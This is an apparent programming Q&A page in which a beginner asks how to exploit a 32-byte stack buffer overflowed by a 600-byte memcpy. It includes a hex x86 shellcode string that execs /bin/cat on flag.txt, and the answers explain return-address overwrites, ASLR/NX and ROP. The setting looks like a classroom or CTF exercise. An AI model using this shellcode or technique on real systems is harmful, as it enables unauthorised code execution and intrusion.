Home > Back-end >  get shell from memcpy
get shell from memcpy

Time:12-04

I've been trying to get shell from this function but nothing seems to work
so what's happening here is that I have a variable of size 32 bytes and I'm trying to copy 600bytes to it
what I don't understand is, where my shell code will be executed is it inside the 32bytes or in the 600 - 32 bytes.
I can't give the whole working code as this is just a disassembly code from ghidra.

Any help what should I do?
Thanks in advance.

void foo(void *param)
{
  undefined varialbe [32];
  
  memcpy(variable, param, 600);
  return;
}

this is the shellcode I tried

\x31\xc0\x50\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x50\x68\x2e\x74\x78\x74\x68\x66\x6c\x61\x67\x89\xe1\x50\x51\x53\x89\xe1\x31\xc0\x83\xc0\x0b\xcd\x80

I was expecting that I will get a shell on the system if I just input the above shell code. but all I get for not is segfaults.

I'm new to binary exploitations. so sorry if this is a stupid question and sorry for my english.

CodePudding user response:

It looks like you'r trying to overflow the memcpy function, If you'r reaching RIP, it must be filled with an address that you can execute, Classical technique is to have this address lower in the buffer, RIP is set to your payload by the return instruction at the end of the function.

You will need to deactivate modern features, which are address randomization and non executable stack. In case this securities are on on system that you are testing, you have to use a technique that is called ROP, which mean Return Oriented Payload.

This technique uses code allready present in the program. Well, bits of this code, by filling the stack will addresses of instructions that end up with "ret", you can come back to the stack and pick another instruction, this way you'r fill the registers as needed and then do a syscall.

You need to find links about these techniques.

CodePudding user response:

… where my shell code will be executed is it inside the 32bytes or in the 600 - 32 bytes.

The intent here is that the data from param will be copied into memory starting where variable is but going beyond that. Beyond that is data on the stack used to manage function calls, including the return address of the function. The idea is that carefully crafted data in param will put a new return address on the stack, and, when the foo function returns, program execution will jump to that new address.

Doing this requires particular knowledge about the program being attacked and the computing platform it executes on.

Any help what should I do?

Classroom exercises of this nature must be crafted specifically for the system the students are using. You must get the necessary information from your instructor.

  • Related